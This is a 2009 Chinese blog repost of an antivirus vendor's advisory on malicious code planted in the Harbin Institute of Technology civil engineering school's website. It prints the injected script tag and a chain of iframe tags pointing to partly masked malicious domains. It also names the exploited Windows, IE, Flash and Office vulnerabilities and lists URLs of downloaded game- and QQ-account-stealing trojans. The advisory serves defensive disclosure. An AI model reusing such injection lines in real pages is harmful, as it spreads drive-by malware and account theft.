注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

苗得雨:网事争锋

我们在攻击邪恶和黑暗时要毫不留情,但是也要腾出时间来为善行鼓掌,为光明喝彩!

 
 
 

日志

 
 

哈尔滨工业大学土木工程学院挂马事件  

2009-08-07 17:34:11|  分类: 网络安全专栏 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

   2009年8月7日上午9时,安天实验室发现,哈尔滨工业大学土木工程学院(http://civil.hit.edu.cn/),被黑客植入恶意代码,用户如果访问该网站,系统会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。

哈尔滨工业大学土木工程学院挂马页面:

哈尔滨工业大学土木工程学院挂马事件 - 苗得雨 - 苗得雨:网事争锋<script src=http://%77%2E%74%6C%69%6E%65%65%2E%63%6F%6D%2E%63%6E></script>

解密后得<script src=http://w.tlinee***.com.cn></script>

http://w.tlinee***.com.cn问题框架代码:

哈尔滨工业大学土木工程学院挂马事件 - 苗得雨 - 苗得雨:网事争锋<iframe src=http://zyfx987***.cn/dszq/2.htm></iframe>

http://zyfx987***.cn/dszq/2.htm问题框架代码:

哈尔滨工业大学土木工程学院挂马事件 - 苗得雨 - 苗得雨:网事争锋<iframe src=http://ge3uy***.cn/x2/xx.html width=111 height=0 border=0></iframe>

http://ge3uy***.cn/x2/xx.html集成网马框架:

哈尔滨工业大学土木工程学院挂马事件 - 苗得雨 - 苗得雨:网事争锋

 

该挂马网页利用以下漏洞进行传播:

MS06-014漏洞

MS09-032漏洞

MS09-002漏洞

Adobe Flash Player SWF文件漏洞

OWC10.Spreadsheet msDataSourceObject Method Stack Overflow Exploit

漏洞信息与描述:

Microsoft Data Access Components (MDAC) 功能中的漏洞可能允许执行代码(MS06-014)

受影响系统:

Microsoft Windows XP Service Pack 1

Microsoft Windows XP Service Pack 2

Microsoft Windows Server 2003

Microsoft Windows Server 2003 Service Pack 1

Microsoft Windows 98

Microsoft Windows 98 Second Edition (SE)、

Microsoft Windows Millennium Edition (ME)

Microsoft Windows 2000 Service Pack 4

描述和解决方案:

Microsoft已经发布了安全公告和相应补丁:

链接:http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx

Microsoft Internet Explorer未初始化的内存损坏漏洞(MS09-002)

受影响版本:

Microsoft Internet Explorer 7.0

解决方案:

Microsoft已经发布了安全公告和相应补丁:

链接:http://www.microsoft.com/china/technet/security/bulletin/MS09-002.mspx

MS09-002 IE7 漏洞原理分析:

链接:http://www.antiy.com/cn/security/2009/s090220_002.htm

Microsoft DirectShow MPEG2溢出漏洞(MS09-032)

受影响系统:

Windows XP Service Pack 2 和 Windows XP Service Pack 3

Windows XP Professional x64 Edition Service Pack 2

Windows Server 2003 Service Pack 2

Windows Server 2003 x64 Edition Service Pack 2

Windows Server 2003 SP2(用于基于 Itanium 的系统)

解决方案:

Microsoft已经发布了安全公告和相应补丁:

链接:http://www.microsoft.com/china/technet/security/bulletin/MS09-032.mspx

Adobe Flash Player SWF文件漏洞

受影响版本:

Adobe Flash Player 9.0.115.0以及以前的版本

解决方案:

Adobe已经发布了安全公告和相应补丁:

链接:http://www.adobe.com/support/security/bulletins/apsb08-11.html

OWC10.Spreadsheet msDataSourceObject Method Stack Overflow Exploit

受影响版本:

Microsoft Office Web Components 10

临时解决方法:

为clsid: 0002E551-0000-0000-C000-000000000046设置kill-bit。

解决方案:

目前微软官方还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本

http://www.microsoft.com/china/technet/security/

当用户访问挂马网站,系统会自动下载病毒文件:

1、网页木马直接下载的病毒文件:

http://d.nkwxs***.com/xx/x2.css 病毒名:Trojan/Win32.Agent.bprt[Downloader]

病毒描述:下载者木马

衍生文件:无

2、下载者木马读取下载列表地址:

http://txt.ioxxk***.com/xx.txt

3、由下载者木马下载的其他病毒文件:

http://www.pakkw***.com/img/1.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]

病毒描述:梦幻西游online盗号木马

衍生文件:

c:\WINDOWS\system32\Qh6xX7VN48sVPnK.dll

c:\WINDOWS\Fonts\CcKKcpwJmND4.Ttf

http://www.pakkw***.com/img/2.exe 病毒名:Trojan/Win32.Magania.bmml[GameThief]

病毒描述:DNF游戏盗号木马

衍生文件:

c:\WINDOWS\system32\v54M9wWBuNGTf2m.dll

c:\WINDOWS\system32\dfc8ac3ed7da.dll

c:\WINDOWS\system32\comres.dll

c:\WINDOWS\Fonts\yHguCdqt6hp2.Ttf

http://www.pakkw***.com/img/3.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]

病毒描述:魔兽世界游戏盗号木马

衍生文件:

c:\WINDOWS\system32\xg4hAPNygs29.dll

c:\WINDOWS\Fonts\K7XaTBMWp8TPrYgw.Ttf

http://www.pakkw***.com/img/4.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]

病毒描述:游戏盗号木马

衍生文件:

c:\WINDOWS\system32\WcCtgJ4zcxHF.dll

c:\WINDOWS\Fonts\CSzZ3gVtf.Ttf

http://www.pakkw***.com/img/5.exe 病毒名:Trojan/Win32.Agent.ayqa[Dropper]

病毒描述:大话西游 ii游戏盗号木马

衍生文件:

c:\WINDOWS\system32\MV3ArsBMAPjxBcRuu.dll

c:\WINDOWS\Fonts\jFwbmsUefPJv9F.Ttf

http://www.pakkw***.com/img/6.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]

病毒描述:封神榜网络版游戏盗号木马

衍生文件:

c:\WINDOWS\system32\Q9q2MHJ3uTBErM7wc.dll

c:\WINDOWS\Fonts\GD9xUjmZ8vHS5Vj.Ttf

http://www.pakkw***.com/img/7.exe 病毒名:Trojan/Win32.Magania.bijm[GameThief]

病毒描述:游戏盗号木马

衍生文件:

c:\WINDOWS\Fonts\gfq7ymgpkp.Ttf

c:\WINDOWS\Fonts\sbzjqregd6tch.fon

http://www.pakkw***.com/img/8.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]

病毒描述:游戏盗号木马

衍生文件:

c:\WINDOWS\system32\a4rxQxCvNBMNnpqs.dll

c:\WINDOWS\Fonts\Rfs3DRdsUfkma5.Ttf

http://www.pakkw***.com/img/9.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]

病毒描述:封神榜网络版游戏盗号木马

衍生文件:

c:\WINDOWS\system32\76B9BA7A.dll

c:\WINDOWS\Fonts\pDuuqr4BgFn65AeW.Ttf

http://www.pakkw***.com/img/12.exe 病毒名:Trojan/Win32.Slefdel.dzl

病毒描述:未知

衍生文件:无

http://www.pakkw***.com/img/13.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]

病毒描述:传奇外传游戏盗号木马

衍生文件:

c:\WINDOWS\system32\JBn2ypqY23vWX.dll

c:\WINDOWS\Fonts\du3Q2JXbHYGxcSAe.Ttf

http://www.pakkw***.com/img/15.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]

病毒描述:游戏盗号木马

衍生文件:

c:\WINDOWS\system32\704C3595.dll

c:\WINDOWS\Fonts\S8a8cnEuaydPJGg8.Ttf

http://www.pakkw***.com/img/16.exe 病毒名:Trojan/Win32.Small.bub

病毒描述:木马下载器

衍生文件:

c:\WINDOWS\Tasks\1

http://www.pakkw***.com/img/17.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]

病毒描述:游戏盗号木马

衍生文件:

c:\WINDOWS\system32\z5WRXqHagksJxWt.dll

c:\WINDOWS\Fonts\sUfa6DfmrK.Ttf

http://www.pakkw***.com/img/18.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]

病毒描述:游戏盗号木马

衍生文件:

c:\WINDOWS\system32\skcfujQ5EDN.dll

c:\WINDOWS\Fonts\YywxhF7TSnkktrJw.Ttf

http://www.pakkw***.com/img/19.exe 病毒名:Trojan/Win32.Magania.bful[GameThief]

病毒描述:游戏盗号木马

衍生文件:

c:\WINDOWS\Fonts\RCZbVbjCY6wYszD3.Ttf

c:\WINDOWS\Fonts\A97CRaCB.fon

http://www.pakkw***.com/img/20.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]

病毒描述:诛仙游戏盗号木马

衍生文件:

c:\WINDOWS\system32\rfpz9wwyy2np.dll

c:\WINDOWS\Fonts\vztr58qstaca8y8j.Ttf

http://www.pakkw***.com/img/21.exe 病毒名:Trojan/Win32.Agent.adxr[Dropper]

病毒描述:MS08067漏洞溢出木马

衍生文件:

c:\Documents and Settings\a\Local Settings\Temp\11231237

http://www.pakkw***.com/img/22.exe 病毒名:Trojan/Win32.QQPASS.bsd[PSW]

病毒描述:QQ盗号木马

衍生文件:

c:\Program Files\Internet Explorer\D9.dll

c:\Program Files\Internet Explorer\D9.tmp

c:\Program Files\Internet Explorer\E.bak

安天反病毒工程师建议:

1、使用安天防线2009或锐甲可以完全防住此挂马网页。

哈尔滨工业大学土木工程学院挂马事件 - 苗得雨 - 苗得雨:网事争锋2、用安天防线2009可以查杀此挂马网页下载的病毒文件。

3、请及时更新安天防线2009,以确保您的计算机安全,防止计算机病毒入侵。如未安装安天防线请点击此处(http://www.antiyfx.com/download.htm)免费下载最新版安天防线2009来防止病毒入侵。

  评论这张
 
阅读(218)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017